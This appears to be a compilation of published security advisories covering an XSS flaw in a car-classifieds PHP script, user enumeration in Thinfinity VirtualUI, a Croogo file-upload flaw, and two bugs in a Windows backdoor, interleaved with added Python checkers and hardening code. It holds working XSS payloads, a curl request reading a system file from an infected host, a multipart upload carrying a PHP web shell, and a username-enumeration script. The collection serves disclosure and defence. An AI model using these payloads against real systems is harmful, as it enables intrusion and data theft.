<pre><code>Document Title:<br />===============<br />Car Portal Template - (Search) Non-Persistent Web Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2299<br /><br /><br />Release Date:<br />=============<br />2022-02-08<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2299<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.6<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Non Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Advanced web solution for creating multi-user car classifieds and auto portal websites. The software has many different features<br />for both the administrators to manage the sites and for the users like functionality for the car dealers to create and manage<br />their own micro site, email alerts in order to notify the users when new cars meeting their search criteria are listed, save the<br />car listings, recommend them to friends, share the listings on the social networks, multi-language support and many others.<br /><br />(Copy of the Homepage: https://www.netartmedia.net/pricing#car-portal )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a non-persistent post inject (cross site scripting) vulnerability in the Car Portal Template PHP Script.<br /><br /><br />Affected Product(s):<br />====================<br />NetArt Media<br />Product: Car Portal Template PHP Script (v2021) - CMS (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-09-01: Researcher Notification & Coordination (Security Researcher)<br />2021-09-02: Vendor 
Notification (Security Department)<br />2021-**-**: Vendor Response/Feedback (Security Department)<br />2021-**-**: Vendor Fix/Patch (Service Developer Team)<br />2021-**-**: Security Acknowledgements (Security Department)<br />2022-02-08: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Pre Auth (No Privileges or Session)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A non-persistent post inject web vulnerability has been discovered in the official Car Portal Template PHP Script.<br />The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user<br />session data or to manipulate application contents for clients.<br /><br />The cross site scripting web vulnerability is located in the `username`, `user_first_name`, `user_last_name`, `variant`,<br />`power`, and `mileage` parameters of the `index search` module. Remote attackers without privileged access are able to<br />inject their own malicious script code into the search input fields of the index module post method request. 
The execution takes<br />place in the results page of the search after the form is submitted via POST.<br /><br />Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent<br />external redirects to malicious sources and non-persistent manipulation of affected application modules.<br /><br />Request method(s):<br />[+] POST<br /><br />Vulnerable File(s):<br />[+] index.php<br /><br />Vulnerable Input(s):<br />[+] Trim<br />[+] Power<br />[+] Mileage<br />[+] First name<br />[+] Last name<br />[+] Username<br /><br />Vulnerable Parameter(s):<br />[+] username<br />[+] user_first_name<br />[+] user_last_name<br />[+] variant<br />[+] power<br />[+] mileage<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The client-side post inject web vulnerability can be exploited by remote attackers without an account and with low or medium user interaction.<br />For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />--- PoC Session Logs (POST) ---<br />https://car-portal-template.localhost:8080/cars2/index.php<br />Host: car-portal-template.localhost:8080<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 878<br />Origin: https://car-portal-template.localhost:8080<br />Connection: keep-alive<br />Referer: https://car-portal-template.localhost:8080/cars2/index.php<br />Cookie: language=en; PHPSESSID=23d238178bfb19f9bd93f25f1b465822<br />ad_type=&selected_package=0&property_type=1,1&property_zip=&price=,&mod=sell&lang=en&Step=2&current_type=1<br />&type=1&username="><img src="evil.source" onload=alert(document.domain)>&password="><img src="evil.source" onload=alert(document.domain)><br />&user_first_name="><img src="evil.source" onload=alert(document.domain)>&user_last_name="><img src="evil.source" 
onload=alert(document.domain)><br />&user_email=test@aol.de&user_phone=&car_make=Aixam&car_model=505&variant="><img src="evil.source" onload=alert(document.domain)><br />&year=2004&location1=18&location2=-1&level_location=&post_location=18<br />&power="><img src="evil.source" onload=alert(document.domain)>&mileage="><img src="evil.source" onload=alert(document.domain)><br />&transmission=M_MANUAL&fuel_type=M_PETROL&exterior_color=M_WHITE&description=<br />-<br />POST: HTTP/2.0 200 OK<br />server: Apache<br />set-cookie: language=en; expires=Tue; Max-Age=31536000<br />vary: Accept-Encoding<br />content-encoding: gzip<br />content-length: 6974<br />content-type: text/html; charset=UTF-8<br /><br />Note: Search queries can also be saved and replayed by the client within the session for follow-up exploitation.<br /><br /><br />Reference(s):<br />https://car-portal-template.localhost:8080/<br />https://car-portal-template.localhost:8080/cars2/<br />https://car-portal-template.localhost:8080/cars2/index.php<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. 
Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to ask for permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
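The advisory above describes a reflected (non-persistent) XSS: values POSTed to index.php are echoed into the results page without output encoding. The following is an added example, not code from the advisory or from NetArt Media's product. It builds the PoC request body with a harmless marker in place of the onload payload, then classifies a response as reflecting the marker raw (exploitable), entity-encoded (what PHP's htmlspecialchars() would emit) or not at all. The two template renderers and the responses they produce are constructed for this example; the field names and the other PoC values come from the advisory, and the e-mail address is a placeholder.

```python
import html
from urllib.parse import urlencode

# Harmless marker that still carries the characters a reflected-XSS sink must
# encode: a double quote to break out of an attribute value and angle brackets
# to open a tag. Nothing in it executes, unlike the advisory's onload payload.
MARKER = 'vl2299"><zz>'

# Fields the advisory lists as vulnerable. The PoC request body spells the
# last one 'mileage', so that spelling is used here.
VULNERABLE_FIELDS = ("username", "user_first_name", "user_last_name",
                     "variant", "power", "mileage")


def build_post_body(field, marker=MARKER):
    """Urlencoded body for POST /cars2/index.php with the marker in one field.
    The remaining values mirror the advisory's PoC request."""
    if field not in VULNERABLE_FIELDS:
        raise ValueError("not a field from the advisory: " + field)
    params = {"mod": "sell", "lang": "en", "Step": "2", "type": "1",
              "car_make": "Aixam", "car_model": "505", "year": "2004",
              "user_email": "test@example.invalid"}  # placeholder address
    params[field] = marker
    return urlencode(params)


def classify_reflection(response_html, marker=MARKER):
    """How did the marker come back in the response body?

    'raw'     - verbatim, so the quote and brackets reach the HTML parser;
                this is the condition the advisory reports
    'escaped' - entity-encoded as htmlspecialchars(..., ENT_QUOTES) emits it
    'absent'  - not reflected at all
    """
    if marker in response_html:
        return "raw"
    if html.escape(marker, quote=True) in response_html:
        return "escaped"
    return "absent"


def render_value_unsafe(field, value):
    """Constructed stand-in for a template that interpolates the submitted
    value straight into an attribute. Shown only to illustrate the defect."""
    return '<input type="text" name="%s" value="%s">' % (field, value)


def render_value_safe(field, value):
    """Hardened form: encode on output, including the double quote that would
    otherwise close the attribute. For these characters html.escape(quote=True)
    produces the same entities as PHP's htmlspecialchars() with ENT_QUOTES."""
    return '<input type="text" name="%s" value="%s">' % (
        field, html.escape(value, quote=True))


def scan_fields(render):
    """Push the marker through every vulnerable field with the given renderer
    and return the names of the fields that reflect it raw."""
    return [f for f in VULNERABLE_FIELDS
            if classify_reflection(render(f, MARKER)) == "raw"]


if __name__ == "__main__":
    print("POST body:", build_post_body("variant"))
    print("raw reflection, unsafe template:", scan_fields(render_value_unsafe))
    print("raw reflection, safe template:  ", scan_fields(render_value_safe))
```

Against a live instance the renderer is replaced by the HTTP response body of the POST; the thing to look for is the 'raw' classification, not a browser alert, because the marker never executes.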
<pre><code># Exploit Title: Cybele Thinfinity VirtualUI 2.5.41.0 - User Enumeration<br /># Date: 13/12/2021<br /># Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed<br /># Vendor Homepage: https://www.cybelesoft.com<br /># Software Link: https://www.cybelesoft.com/thinfinity/virtualui/<br /># Version: vulnerable < v3.0<br /># Tested on: Microsoft Windows<br /># CVE: CVE-2021-44848<br /><br />How it works: By accessing the vector, an attacker can determine whether a username exists from the message returned; the message may be presented in different languages depending on the VirtualUI configuration. Common usernames to try are administrator, admin, guest...<br />Payload: The vulnerable vector is "https://example.com/changePassword?username=USERNAME", where "USERNAME" needs to be brute-forced.<br />Reference: https://github.com/cybelesoft/virtualui/issues/1<br /><br /></code></pre>
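A worked version of the oracle described above, added here and not part of the advisory. The message text VirtualUI returns is not given in the advisory and varies with the configured language, so the classifier does not match on strings at all: it captures a baseline from a username that cannot exist, normalises away the parts of a response that legitimately differ between probes (the echoed username, hex tokens, whitespace) and flags any candidate whose normalised response differs from that baseline. The `fake_server` function, its two messages and the `KNOWN_ACCOUNTS` set are constructed for this example and say nothing about the real product's wording.

```python
import hashlib
import re
import secrets
from urllib.parse import quote

ENDPOINT = "/changePassword"  # the vector named in the advisory


def probe_url(base_url, username):
    """URL for one probe, e.g. https://example.com/changePassword?username=admin"""
    return "%s%s?username=%s" % (base_url.rstrip("/"), ENDPOINT,
                                  quote(username, safe=""))


def baseline_username():
    """A name that will not exist, used to capture the 'unknown user' response."""
    return "zz" + secrets.token_hex(6)


def normalise(body, username):
    """Remove what legitimately varies between probes so only the server's
    decision is left: the echoed username, long hex tokens (session ids,
    nonces) and whitespace runs. Language does not matter, because response
    shapes are compared rather than words."""
    body = body.replace(username, "{user}")
    body = re.sub(r"\b[0-9a-f]{16,}\b", "{token}", body)
    return re.sub(r"\s+", " ", body).strip()


def fingerprint(body, username):
    return hashlib.sha256(normalise(body, username).encode("utf-8")).hexdigest()


def enumerate_users(candidates, fetch, base_url="https://example.com"):
    """Return the candidates whose response shape differs from the baseline.
    `fetch(url, username)` must return the response body as a string; on an
    engagement it performs the HTTP GET, here a constructed server is passed."""
    unknown = baseline_username()
    baseline = fingerprint(fetch(probe_url(base_url, unknown), unknown), unknown)
    found = []
    for name in candidates:
        if fingerprint(fetch(probe_url(base_url, name), name), name) != baseline:
            found.append(name)
    return found


# --- constructed stand-in for the vulnerable endpoint (not the real product) ---
KNOWN_ACCOUNTS = {"administrator", "admin"}  # assumed local accounts


def fake_server(url, username):
    """Mimics the defect: different wording for existing and unknown users,
    plus an echoed username and a per-request token that defeat naive diffing."""
    token = secrets.token_hex(16)
    if username in KNOWN_ACCOUNTS:
        return ("<p>A reset link was sent to the address on file for %s.</p>\n"
                "<!-- %s -->" % (username, token))
    return "<p>No account named %s was found.</p>\n<!-- %s -->" % (username, token)


if __name__ == "__main__":
    print(enumerate_users(["administrator", "guest", "admin", "bob"], fake_server))
```

Two caveats when pointing this at a real host: take the baseline more than once to make sure the unknown-user response is stable, and rate-limit the probes, since every candidate is one request against a password-reset endpoint.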
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/1e3665a67201209609ae493a2a590bee_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Zombam.b<br />Vulnerability: Unauthenticated Information Disclosure<br />Description: z0mbie's HTTP RAT v0.1a listens on TCP port 80 to display an HTML Web UI for basic remote administration capability. Third-party attackers who can reach the backdoor can read dir/files on the system.<br />Type: PE32<br />MD5: 1e3665a67201209609ae493a2a590bee<br />Vuln ID: MVID-2022-0488<br />Disclosure: 02/16/2022<br /><br />Exploit/PoC:<br />curl http://MALWARE_INFECTED_HOST/C:/Windows/system.ini<br />; for 16-bit app support<br />[386Enh]<br />woafont=dosapp.fon<br />EGA80WOA.FON=EGA80WOA.FON<br />EGA40WOA.FON=EGA40WOA.FON<br />CGA80WOA.FON=CGA80WOA.FON<br />CGA40WOA.FON=CGA40WOA.FON<br /><br />[drivers]<br />wave=mmdrv.dll<br />timer=timer.drv<br /><br />[mci]<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. 
All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
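The RAT above serves whatever path follows the first slash, which is why `/C:/Windows/system.ini` returns the real file. The following is an added example, not code from the advisory or from the malware, of what even a minimal HTTP file handler should do instead: map the request path onto a fixed document root and refuse anything that escapes it. The document root and the default document name are assumed values.

```python
import posixpath
import re
from urllib.parse import unquote

DOCROOT = "/srv/www"  # assumed document root for this example


def resolve_request_path(url_path, docroot=DOCROOT):
    """Map an HTTP request path to a file under docroot, or return None.

    Rejects, in order: embedded NUL bytes, drive-letter and UNC targets (the
    form the RAT serves), and any '..' that would climb above the root after
    percent-decoding and normalisation.
    """
    path = unquote(url_path.split("?", 1)[0])
    if "\x00" in path:
        return None
    path = path.replace("\\", "/")           # "..\" must not pass as a name
    if re.match(r"^/?[A-Za-z]:", path) or path.startswith("//"):
        return None                          # C:/..., //server/share/...
    rel = posixpath.normpath(path.lstrip("/"))   # collapses ".", ".." and "//"
    if rel == ".." or rel.startswith("../"):
        return None
    if rel == ".":
        rel = "index.html"                   # assumed default document
    full = posixpath.join(docroot, rel)
    # Belt and braces: the joined path must still sit inside docroot.
    if posixpath.commonpath([docroot, full]) != docroot:
        return None
    return full


def serve_probe(url_path):
    """Status this handler would give the advisory's curl request."""
    return "403" if resolve_request_path(url_path) is None else "200"


if __name__ == "__main__":
    for p in ("/C:/Windows/system.ini", "/../etc/passwd", "/%2e%2e/etc/passwd",
              "/a/../b.txt", "/index.html"):
        print(p, "->", resolve_request_path(p))
```

Note that the decode happens once, before normalisation: a doubly encoded `%252e%252e` decodes to the literal text `%2e%2e`, which is then just a directory name under the root rather than a traversal.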
<pre><code># Exploit Title: Croogo 3.0.2 - Unrestricted File Upload<br /># Date: 06/12/2021<br /># Exploit Author: Enes Özeser<br /># Vendor Homepage: https://croogo.org/<br /># Software Link: https://downloads.croogo.org/v3.0.2.zip<br /># Version: 3.0.2<br /># Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3<br /><br />==> 'setting-43' Unrestricted File Upload <==<br /><br />1- Log in with a privileged account.<br />2- Click on the 'Settings' section.<br />3- Go to 'Themes'. The path is '/admin/settings/settings/prefix/Theme'.<br />4- Choose a malicious PHP script and upload it.<br />5- Request '/uploads/(NAME).php', replacing 'NAME' with the filename you uploaded.<br />6- The malicious PHP script is executed.<br /><br />POST /admin/settings/settings/prefix/Theme HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------360738881613175158033315978127<br />Content-Length: 970<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/settings/settings/prefix/Theme<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------360738881613175158033315978127<br />Content-Disposition: form-data; name="_method"<br /><br />POST<br />-----------------------------360738881613175158033315978127<br />Content-Disposition: form-data; name="_csrfToken"<br 
/><br />c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a<br />-----------------------------360738881613175158033315978127<br />Content-Disposition: form-data; name="setting-43"; filename="malicious.php"<br />Content-Type: application/octet-stream<br /><br /><?php<br />$command = shell_exec('netstat -an');<br />echo "<pre>$command</pre>";<br />?><br /><br />-----------------------------360738881613175158033315978127<br />Content-Disposition: form-data; name="_Token[fields]"<br /><br />c4e0a45b25b5eaf8fa6e0e4ddcd3be00c621b803%3A<br />-----------------------------360738881613175158033315978127<br />Content-Disposition: form-data; name="_Token[unlocked]"<br /><br /><br />-----------------------------360738881613175158033315978127--<br /><br /></code></pre>
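The request above shows what the theme-settings upload accepts: a `.php` file under a client-chosen name, with a client-supplied `application/octet-stream` Content-Type, that is later executed from `/uploads/`. The following is an added example, not Croogo code, of the server-side checks that close this class of bug: an extension allow-list evaluated over every dot-separated part of the name (so `shell.php.png` is caught), a magic-byte check of the content, and a server-generated storage name. The allowed types are an assumed set for a theme-asset upload; the sample files are constructed, the web-shell body being the one from the PoC.

```python
import os
import secrets

# Assumed allow-list for a theme-asset upload: extension -> leading magic bytes.
ALLOWED_TYPES = {
    "png":  b"\x89PNG\r\n\x1a\n",
    "gif":  b"GIF8",
    "jpg":  b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}

# Parts that make a name executable or special on a PHP-capable web server.
# Checking every part, not just the last, catches double extensions.
SERVER_SIDE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phps",
                          "phtml", "phar", "htaccess", "cgi", "pl", "py"}


def validate_upload(filename, data):
    """Return (accepted, reason_or_extension). The client's Content-Type header
    is never consulted: it is attacker-controlled, as the PoC request shows."""
    name = os.path.basename(filename.replace("\\", "/")).lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing or hidden extension"
    for part in parts[1:]:
        if part in SERVER_SIDE_EXTENSIONS:
            return False, "server-side extension in name"
    ext = parts[-1]
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        return False, "extension not on allow-list"
    if not data.startswith(magic):
        return False, "content does not match extension"
    if b"<?" in data:
        return False, "PHP open tag inside image data"   # crude polyglot guard
    return True, ext


def storage_name(ext):
    """Server-chosen name: no user-supplied text survives into the path."""
    return "%s.%s" % (secrets.token_hex(16), ext)


def handle_upload(filename, data):
    """Accept or reject one upload; returns the stored name or None."""
    ok, info = validate_upload(filename, data)
    return storage_name(info) if ok else None


# Constructed samples; the web-shell body is the one from the PoC request.
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
WEBSHELL = (b"<?php\n$command = shell_exec('netstat -an');\n"
            b"echo \"<pre>$command</pre>\";\n?>\n")

if __name__ == "__main__":
    for fname, body in (("malicious.php", WEBSHELL), ("shell.php.png", PNG),
                        ("logo.png", WEBSHELL), ("logo.png", PNG),
                        (".htaccess", b"x")):
        print(fname, validate_upload(fname, body))
```

Even with these checks in place, the upload directory should be served with script execution disabled, so that a validation gap does not turn straight into remote code execution.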
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/1e3665a67201209609ae493a2a590bee.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Zombam.b<br />Vulnerability: Remote Stack Buffer Overflow<br />Description: z0mbie's HTTP RAT v0.1a listens on TCP port 80 to display an HTML Web UI for basic remote administration capability. Third-party attackers who can reach an infected system can trigger a buffer overflow overwriting the EBP and EIP registers by sending a specially crafted HTTP request.<br />Type: PE32<br />MD5: 1e3665a67201209609ae493a2a590bee<br />Vuln ID: MVID-2022-0487<br />ASLR: False<br />DEP: False<br />Safe SEH: True<br />Disclosure: 02/16/2022 <br /><br />Memory Dump:<br />(148c.dd4): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=9d082a1a edx=00000000 esi=00000003 edi=00000003<br />eip=7770ed3c esp=0538f194 ebp=0538f324 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />7770ed3c c21400 ret 14h<br /><br />0:006> .ecxr<br />eax=00000000 ebx=040202b0 ecx=9d082a1a edx=00000000 esi=0538fb51 edi=04020330<br />eip=41414141 esp=0538fab4 ebp=41414141 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202<br />41414141 ?? 
???<br /><br />0:006> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br /><br />FAULTING_IP: <br />+3485<br />41414141 ?? ???<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 41414141<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 41414141<br />Attempt to read from address 41414141<br /><br />PROCESS_NAME: Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000000<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />READ_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485<br />00403485 50 push eax<br /><br />FAILED_INSTRUCTION_ADDRESS: <br />+3485<br />41414141 ?? 
???<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 00000dd4<br /><br />BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />IP_ON_HEAP: 41414141<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />IP_IN_FREE_BLOCK: 41414141<br /><br />FRAME_ONE_INVALID: 1<br /><br />LAST_CONTROL_TRANSFER: from 41414141 to 41414141<br /><br />STACK_TEXT: <br />WARNING: Frame IP not in any known module. Following frames may be wrong.<br />0538fab0 41414141 41414141 41414141 41414141 0x41414141<br />0538fab4 41414141 41414141 41414141 41414141 0x41414141<br />0538fab8 41414141 41414141 41414141 41414141 0x41414141<br />0538fabc 41414141 41414141 41414141 41414141 0x41414141<br />0538fac0 41414141 41414141 41414141 41414141 0x41414141<br />0538fac4 41414141 41414141 41414141 41414141 0x41414141<br />0538fac8 41414141 41414141 41414141 41414141 0x41414141<br />0538facc 41414141 41414141 41414141 41414141 0x41414141<br />0538fad0 41414141 41414141 41414141 41414141 0x41414141<br />0538fad4 41414141 41414141 41414141 41414141 0x41414141<br />0538fad8 41414141 41414141 41414141 41414141 0x41414141<br />0538fadc 41414141 41414141 41414141 41414141 0x41414141<br />0538fae0 41414141 41414141 41414141 41414141 0x41414141<br />0538fae4 41414141 41414141 41414141 41414141 0x41414141<br />0538fae8 41414141 41414141 41414141 41414141 0x41414141<br />0538faec 41414141 41414141 41414141 41414141 0x41414141<br />0538faf0 41414141 41414141 41414141 41414141 0x41414141<br />0538faf4 41414141 41414141 41414141 41414141 
0x41414141<br />0538faf8 41414141 41414141 41414141 41414141 0x41414141<br />0538fafc 41414141 41414141 41414141 41414141 0x41414141<br />0538fb00 41414141 41414141 41414141 41414141 0x41414141<br />0538fb04 41414141 41414141 41414141 41414141 0x41414141<br />0538fb08 41414141 41414141 41414141 41414141 0x41414141<br />0538fb0c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb10 41414141 41414141 41414141 41414141 0x41414141<br />0538fb14 41414141 41414141 41414141 41414141 0x41414141<br />0538fb18 41414141 41414141 41414141 41414141 0x41414141<br />0538fb1c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb20 41414141 41414141 41414141 41414141 0x41414141<br />0538fb24 41414141 41414141 41414141 41414141 0x41414141<br />0538fb28 41414141 41414141 41414141 41414141 0x41414141<br />0538fb2c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb30 41414141 41414141 41414141 41414141 0x41414141<br />0538fb34 41414141 41414141 41414141 41414141 0x41414141<br />0538fb38 41414141 41414141 41414141 41414141 0x41414141<br />0538fb3c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb40 41414141 41414141 41414141 41414141 0x41414141<br />0538fb44 41414141 41414141 41414141 41414141 0x41414141<br />0538fb48 41414141 41414141 41414141 41414141 0x41414141<br />0538fb4c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb50 41414141 41414141 41414141 41414141 0x41414141<br />0538fb54 41414141 41414141 41414141 41414141 0x41414141<br />0538fb58 41414141 41414141 41414141 41414141 0x41414141<br />0538fb5c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb60 41414141 41414141 41414141 41414141 0x41414141<br />0538fb64 41414141 41414141 41414141 41414141 0x41414141<br />0538fb68 41414141 41414141 41414141 41414141 0x41414141<br />0538fb6c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb70 41414141 41414141 41414141 41414141 0x41414141<br />0538fb74 41414141 41414141 41414141 41414141 0x41414141<br />0538fb78 41414141 41414141 
41414141 41414141 0x41414141<br />0538fb7c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb80 41414141 41414141 41414141 41414141 0x41414141<br />0538fb84 41414141 41414141 41414141 41414141 0x41414141<br />0538fb88 41414141 41414141 41414141 41414141 0x41414141<br />0538fb8c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb90 41414141 41414141 41414141 41414141 0x41414141<br />0538fb94 41414141 41414141 41414141 41414141 0x41414141<br />0538fb98 41414141 41414141 41414141 41414141 0x41414141<br />0538fb9c 41414141 41414141 41414141 41414141 0x41414141<br />0538fba0 41414141 41414141 41414141 41414141 0x41414141<br />0538fba4 41414141 41414141 41414141 41414141 0x41414141<br />0538fba8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbac 41414141 41414141 41414141 41414141 0x41414141<br />0538fbb0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbb4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbb8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbbc 41414141 41414141 41414141 41414141 0x41414141<br />0538fbc0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbc4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbc8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbcc 41414141 41414141 41414141 41414141 0x41414141<br />0538fbd0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbd4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbd8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbdc 41414141 41414141 41414141 41414141 0x41414141<br />0538fbe0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbe4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbe8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbec 41414141 41414141 41414141 41414141 0x41414141<br />0538fbf0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbf4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbf8 41414141 41414141 41414141 41414141 